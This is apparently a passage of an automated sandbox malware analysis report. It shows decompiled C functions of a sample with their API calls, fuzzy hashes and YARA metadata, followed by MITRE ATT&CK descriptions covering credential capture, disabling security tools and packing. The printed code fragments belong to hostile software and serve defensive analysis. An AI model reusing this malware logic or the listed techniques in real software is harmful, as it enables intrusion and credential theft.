0x0040d97d
0x0040d98b
0x0040d986
0x0040d99e
0x0040d9a3
0x0040d9a6
0x0040d9ae
0x00000000
0x00000000
0x00000000
0x0040d9ae
0x0040d988
0x0040d988
0x00000000
0x0040d98f
0x0040d977
0x0040d977
0x00000000
0x0040d977
0x0040d94f
0x0040d956
0x00000000
0x00000000
0x00000000
0x0040d958
0x00000000
0x0040d92e
0x0040d8df
0x0040d8e1
0x0040d8d4
0x00000000

APIs

Part of subcall function 0040CDF1: getsockname.WS2_32(?,?,?), ref: 0040CE0F

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040D96D
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0040D9A6

Part of subcall function 0040CC2C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040CC42

Part of subcall function 0040D828: getpeername.WS2_32(000000FF,00000000,00000000), ref: 0040D84C

Part of subcall function 0040CA62: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040CB02

Strings

Z, xrefs: 0040DADF

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: 2f93316010db0cc5ac07005f390db17c976ecc66a55229d8b43d415c03685d43
Instruction ID: 92d7aeae0dbda4aeaaea9ad5e34d859805d1b11d83b8d52d4d0fb92601588248
Opcode Fuzzy Hash: 2f93316010db0cc5ac07005f390db17c976ecc66a55229d8b43d415c03685d43
Instruction Fuzzy Hash: 9E613872E04148AADF20EBE88C45AEFBBB59F45314F00467BF951B32C1D27C4909CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E302, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040E302(intOrPtr _a4) {
				void* _t26;
				intOrPtr _t28;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_t34 = 0;
				if(E0040E223() != 0) {
					_t36 = HeapAlloc( *0x41a570, 8, 0x954);
					if(_t36 == 0) {
						L7:
						E0040E2E1();
					} else {
						_t2 = _t36 + 0x53e; // 0x53e
						if(E0040B635(0, _t2, _a4) == 0) {
							L6:
							E004097F7(_t36);
							goto L7;
						} else {
							_t3 = _t36 + 0x746; // 0x746
							if((GetTempPathW(0x103, _t3) & 0xffffff00 | _t22 > 0x00000000) == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t36 + 0x14)) = 0x7fffffff;
								_t7 = _t36 + 0x10; // 0x10
								 *_t7 = 0x7fffffff;
								 *((intOrPtr*)(_t36 + 0x24)) = 1;
								 *((intOrPtr*)(_t36 + 0x28)) = 1;
								_t10 = _t36 + 0x132; // 0x132
								E00409833(_t10, "cabinet.dll", 0xc);
								_t11 = _t36 + 0x232; // 0x232
								_t26 = E00409833(_t11, "?O", 2);
								_t12 = _t36 + 4; // 0x4
								_t28 =  *0x419ba4(_t12, E0040E18E, E0040DE15, E0040DE28, E0040DFB4, E0040DFE9, E0040E021, E0040E069, E0040E092, E0040E0DE, E0040E116, _t26, _t36);
								 *_t36 = _t28;
								if(_t28 == 0) {
									goto L6;
								} else {
									_t34 = _t36;
								}
							}
						}
					}
				}
				return _t34;
			}

0x0040e303
0x0040e30c
0x0040e326
0x0040e32a
0x0040e3f6
0x0040e3f6
0x0040e330
0x0040e334
0x0040e344
0x0040e3f0
0x0040e3f1
0x00000000
0x0040e34a
0x0040e34a
0x0040e363
0x00000000
0x0040e369
0x0040e36e
0x0040e371
0x0040e374
0x0040e37b
0x0040e37e
0x0040e386
0x0040e38d
0x0040e399
0x0040e3a0
0x0040e3d4
0x0040e3dd
0x0040e3e6
0x0040e3ea
0x00000000
0x0040e3ec
0x0040e3ec
0x0040e3ec
0x0040e3ea
0x0040e363
0x0040e344
0x0040e3fb
0x0040e3ff

APIs

Part of subcall function 0040E223: LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040E30A,?,0040E52E,?,?,00000000,?,?), ref: 0040E237
Part of subcall function 0040E223: GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040E257
Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIAddFile), ref: 0040E269
Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040E27B
Part of subcall function 0040E223: GetProcAddress.KERNEL32(FCIDestroy), ref: 0040E28D
Part of subcall function 0040E223: HeapCreate.KERNEL32(00000000,00080000,00000000,0040E52E,?,?,00000000,?,?), ref: 0040E2B8
Part of subcall function 0040E223: FreeLibrary.KERNEL32(0040E52E,?,?,00000000,?,?), ref: 0040E2CD

HeapAlloc.KERNEL32(00000008,00000954,?,?,0040E52E,?,?,00000000,?,?), ref: 0040E320

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

GetTempPathW.KERNEL32(00000103,00000746,0000053E,?,?,0040E52E,?,?,00000000,?,?), ref: 0040E356

Strings

cabinet.dll, xrefs: 0040E381

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$HeapLibraryPath$AllocCombineCreateFreeLoadTemp
String ID: cabinet.dll
API String ID: 3425133823-741892446
Opcode ID: 48aaca12982b289f30402badcb0e1551dc67d364e1bdddf6062dc352f129a5d5
Instruction ID: da6dce2febd5aa4fc80cf14d370decd8c3a07c9147c5ee008dac815c719a33b3
Opcode Fuzzy Hash: 48aaca12982b289f30402badcb0e1551dc67d364e1bdddf6062dc352f129a5d5
Instruction Fuzzy Hash: 3421D131680711BBD224AF669D06F5777999B04B04F104C3FB986BB2D2CAB8D4168A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00413108, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00413108(signed char _a4, intOrPtr* _a8, intOrPtr* _a12) {
				char _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed char _v536;
				char _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				char _v556;
				char _v572;
				char* _t19;
				void* _t26;
				void* _t35;
				void* _t38;

				_v536 = _a4;
				_t19 =  &_v524;
				_v532 = 0;
				_v528 = 0;
				__imp__SHGetFolderPathW(0, 0x21, 0, 0, _t19, _t35, _t38, _t26);
				_t44 = _t19;
				if(_t19 == 0) {
					E0040B4D8( &_v544, 0x402dc0, _t44, 1, 4, E0041307F,  &_v556, 0, 0, 0);
					_t19 = E0040B635(0x402dc4,  &_v572,  &_v572);
					_t45 = _t19;
					if(_t19 != 0) {
						_t19 = E0040B4D8( &_v544, 0x402dc0, _t45, 1, 4, E0041307F,  &_v556, 0, 0, 0);
					}
				}
				if((_a4 & 0x00000002) != 0) {
					 *_a8 = _v552;
					_t19 = _v548;
					 *_a12 = _t19;
				}
				return _t19;
			}

0x0041311a
0x00413120
0x0041312a
0x0041312e
0x00413132
0x00413138
0x0041313a
0x00413159
0x00413169
0x0041316e
0x00413170
0x00413185
0x00413185
0x00413170
0x0041318e
0x00413197
0x00413199
0x004131a0
0x004131a0
0x004131a8

APIs

SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 00413132

Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040B5B6

Strings

Low, xrefs: 00413164
+@, xrefs: 0041314C

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: FindPath$FileSleep$CloseCombineFirstFolderMatchNextObjectSingleSpecWait
String ID: Low$+@
API String ID: 632153265-1076437079
Opcode ID: e501f04e424b4e471eea6b93678b98caa2c16635e860d5f5aa252e1b9d8a1a10
Instruction ID: 5e76bf7bedcab2ebf5009ea198e7bdc01d6f0d2a0432ef094aaa7b1c9b12fecb
Opcode Fuzzy Hash: e501f04e424b4e471eea6b93678b98caa2c16635e860d5f5aa252e1b9d8a1a10
Instruction Fuzzy Hash: 5411A9B2205314BBD220DE19CC45EEBBBDCEF997A4F00452EB948D7281D2709A45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1EE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040B1EE(intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t12;
				void* _t21;
				void* _t22;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t21 = 0;
				while(1) {
					_push(_a4);
					_push(E0040B7DF());
					_push(L"tmp");
					_t19 =  &_v1044;
					_t12 = E0040A4B7(_t11, 0x104,  &_v1044, L"%s%08x.%s");
					_t22 = _t22 + 0x10;
					if(_t12 == 0xffffffff) {
						goto L6;
					}
					if(E0040B635(_t19, _a8,  &_v524) == 0 || E0040AFDF(0, _a8, 0) == 0) {
						_t21 = _t21 + 1;
						if(_t21 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040b211
0x0040b26b
0x00000000
0x0040b26b
0x0040b213
0x0040b215
0x0040b215
0x0040b21d
0x0040b21e
0x0040b22d
0x0040b233
0x0040b238
0x0040b23e
0x00000000
0x00000000
0x0040b253
0x0040b265
0x0040b269
0x00000000
0x00000000
0x00000000
0x0040b273
0x00000000
0x0040b273
0x0040b253
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040B205

Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B

Strings

%s%08x.%s, xrefs: 0040B223
tmp, xrefs: 0040B21E

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
String ID: %s%08x.%s$tmp
API String ID: 3395140874-234517578
Opcode ID: ab5104a325ec2fae6a7b9564ea18a3d51a1971053e8ba385a170c57aa2ec7346
Instruction ID: e4ddcb2964d04d29b3f78f31bdc809782cf81d614a5e3e6b80e95d8d8fb983fc
Opcode Fuzzy Hash: ab5104a325ec2fae6a7b9564ea18a3d51a1971053e8ba385a170c57aa2ec7346
Instruction Fuzzy Hash: 8B01217110021826DE202A248C0EBEF7729DB91324F0005BBFD65B61E1D3B98D8B96DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E116, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E116(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				intOrPtr _t24;
				int _t26;

				_t26 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040B1CD( &_v524) != 0) {
					_t24 = _a4;
					E0040A387(PathFindFileNameW( &_v524), _a8 + 0xfffffffd);
					E00409833(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t26 = 1;
				}
				return _t26;
			}

0x0040e12a
0x0040e140
0x0040e156
0x0040e16f
0x0040e17c
0x0040e183
0x0040e187
0x0040e188
0x0040e18d

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 0040E138

Part of subcall function 0040B1CD: SetFileAttributesW.KERNEL32(?,00000080,0040B03E,?,?,0040B261,?,00000000,?,?), ref: 0040B1D6
Part of subcall function 0040B1CD: DeleteFileW.KERNEL32(?,?,0040B261,?,00000000,?,?), ref: 0040B1E0

PathFindFileNameW.SHLWAPI(?,?,?,?), ref: 0040E167

Strings

cab, xrefs: 0040E12D

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$Name$AttributesDeleteFindPathTemp
String ID: cab
API String ID: 394148526-1787492089
Opcode ID: 2812f9557eacd139aa361d6d9a6ac9e3986b8e2973455101f099709175a863ad
Instruction ID: 10a360aa86a383a03ab508db93b5562bfd94cb1cbc1ba417e6f76bf77114ccc2
Opcode Fuzzy Hash: 2812f9557eacd139aa361d6d9a6ac9e3986b8e2973455101f099709175a863ad
Instruction Fuzzy Hash: 7E01D632A0032467CB10ABA5CC0DF8BB7AC9F45754F0042727959F72D1DA78E9458AD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEBC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AEBC(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v55;
				char _v56;
				void* __edi;
				intOrPtr _t27;

				_t27 = 0;
				_v56 = 1;
				_v55 = 1;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E0040AE3B();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E0040AD09( &_v56, 0) != 0) {
					_t27 = GetTickCount() - _v8;
				}
				E004097F7(_v44);
				return _t27;
			}

0x0040aec4
0x0040aec7
0x0040aecb
0x0040aecf
0x0040aed2
0x0040aee0
0x0040aee3
0x0040aeea
0x0040aeed
0x0040aef0
0x0040aef3
0x0040aef6
0x0040aef9
0x0040af00
0x0040af09
0x0040af13
0x0040af19
0x0040af19
0x0040af1f
0x0040af2a

APIs

Part of subcall function 0040AE3B: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040AE4C
Part of subcall function 0040AE3B: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040AE5F
Part of subcall function 0040AE3B: FreeLibrary.KERNEL32(?), ref: 0040AEB1

GetTickCount.KERNEL32 ref: 0040AF03

Part of subcall function 0040AD09: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 0040AD5D
Part of subcall function 0040AD09: InternetCloseHandle.WININET(00000000), ref: 0040ADF6

GetTickCount.KERNEL32 ref: 0040AF15

Strings

http://www.google.com/webhp, xrefs: 0040AEE3

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: e004a83f47395af42e2ce224490dfaf15c52a71e2629c4fde7e12934fdc2b165
Instruction ID: eb886796597e416cf2c18be26788c6335919ce21cfc9544019f26fa1c0daef68
Opcode Fuzzy Hash: e004a83f47395af42e2ce224490dfaf15c52a71e2629c4fde7e12934fdc2b165
Instruction Fuzzy Hash: D101ECB1D113289ACF00DFE9D9856DEFFB8AF08748F10406BE800B7241D3B55A458BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00408399, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408399(void* __eax, WCHAR* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
				signed int _v5;
				void* __edi;
				void* _t13;
				WCHAR* _t14;
				void* _t17;

				_t14 = __ebx;
				_t17 = __eax;
				_v5 = 0;
				while(1) {
					SetFileAttributesW(_t14, 0x20);
					if(E0040AFDF(_t17, _t14, _a4) != 0) {
						break;
					}
					if(_a8 != 0 || _v5 != 0xa) {
						Sleep((_v5 & 0x000000ff) + 0x1388);
						_v5 = _v5 + 1;
						continue;
					} else {
						_t13 = 0;
					}
					L7:
					return _t13;
				}
				_t13 = 1;
				goto L7;
			}

0x00408399
0x004083a5
0x004083a7
0x004083cc
0x004083cf
0x004083dc
0x00000000
0x00000000
0x004083b1
0x004083c3
0x004083c9
0x00000000
0x004083e2
0x004083e2
0x004083e2
0x004083e4
0x004083e7
0x004083e7
0x004083de
0x00000000

APIs

Sleep.KERNEL32(-00001388,?,00000000,?,?,00408461,00000006,?,?,?), ref: 004083C3
SetFileAttributesW.KERNEL32(?,00000020,.exe,?,?,?,00408461,00000006,?,?,?,?,00000000,00000000,?,?), ref: 004083CF

Part of subcall function 0040AFDF: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040AFF9
Part of subcall function 0040AFDF: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040B261,?,00000000,?,?), ref: 0040B019
Part of subcall function 0040AFDF: CloseHandle.KERNEL32(00000000,?,0040B261,?,00000000,?,?), ref: 0040B02B

Strings

.exe, xrefs: 004083A4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateHandleSleepWrite
String ID: .exe
API String ID: 1511598859-4119554291
Opcode ID: 1ede476427c31d0db83efcf41ff2d4f74a4b3d5edaa51ac5946495b1b28295c4
Instruction ID: 4760a81ed8100325dcb607a7829a2d5cd4f01bf134a94f53c5d1f68178b8541b
Opcode Fuzzy Hash: 1ede476427c31d0db83efcf41ff2d4f74a4b3d5edaa51ac5946495b1b28295c4
Instruction Fuzzy Hash: 28F027B180838479DF1187658D05BDE7F9C9B96714F0450ABF9C1B21D2C87E854AC729

Uniqueness

Uniqueness Score: -1.00%

Function 00412923, Relevance: 5.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412923(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed int _t22;
				signed short _t27;
				signed int _t31;
				void* _t38;

				_t38 = E0040A3AA(_a4);
				if(_t38 > 0x3e8) {
					EnterCriticalSection(0x41aa20);
					E004097F7( *0x41aa14);
					 *0x41aa14 =  *0x41aa14 & 0x00000000;
					 *0x41aa1c = 0;
					LeaveCriticalSection(0x41aa20);
					return 0;
				}
				EnterCriticalSection(0x41aa20);
				_t27 = ( *0x41aa1c & 0x0000ffff) + _t38;
				if(_t27 <= 0x3e8) {
					_t13 = E00409787(_t27 + _t27, 0x41aa14);
					if(_t13 != 0) {
						_t31 =  *0x41aa14; // 0x0
						_t13 = E00409833(_t31 + ( *0x41aa1c & 0x0000ffff) * 2, _a4, _t38 + _t38);
						 *0x41aa1c = _t27;
					}
				} else {
					_t13 = E00409787(0x7d0, 0x41aa14);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t38;
						_t19 =  *0x41aa14; // 0x0
						E00409833(_t19, _t19 + (( *0x41aa1c & 0x0000ffff) - 0x3e8 - _t38) * 2, 0x3e8 - _t38 + _t18);
						_t22 =  *0x41aa14; // 0x0
						_t13 = E00409833(0x3e8 - _t38 + _t18 + _t22, _v8, _t38 + _t38);
						 *0x41aa1c = 0x3e8;
					}
				}
				LeaveCriticalSection(0x41aa20);
				return _t13;
			}

0x0041292f
0x00412938
0x00412940
0x0041294c
0x00412951
0x0041295b
0x00412961
0x00000000
0x00412961
0x00412972
0x0041297f
0x00412988
0x004129d9
0x004129e0
0x004129e2
0x004129fb
0x00412a00
0x00412a00
0x0041298a
0x0041298f
0x00412996
0x004129a1
0x004129a8
0x004129b3
0x004129bc
0x004129c8
0x004129cd
0x004129cd
0x00412996
0x00412a0c
0x00000000

APIs

EnterCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412940

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

LeaveCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412961
EnterCriticalSection.KERNEL32(0041AA20,?,?,?,?,00412BEE,?), ref: 00412972
LeaveCriticalSection.KERNEL32(0041AA20,?,?,?,00412BEE,?), ref: 00412A0C

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: 28d510e95b79f1d70dc268f3e7da87de04893b8ae2bea78006c82f2ed9d17aa6
Instruction ID: fb987a60dc2a9060150928803f526759d5d1c7e9df67218db3e333e7884f06c2
Opcode Fuzzy Hash: 28d510e95b79f1d70dc268f3e7da87de04893b8ae2bea78006c82f2ed9d17aa6
Instruction Fuzzy Hash: B2219272511104ABC610EF99FF489FA37A5AF84388B00803BF401A31A2DB785875CB6E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

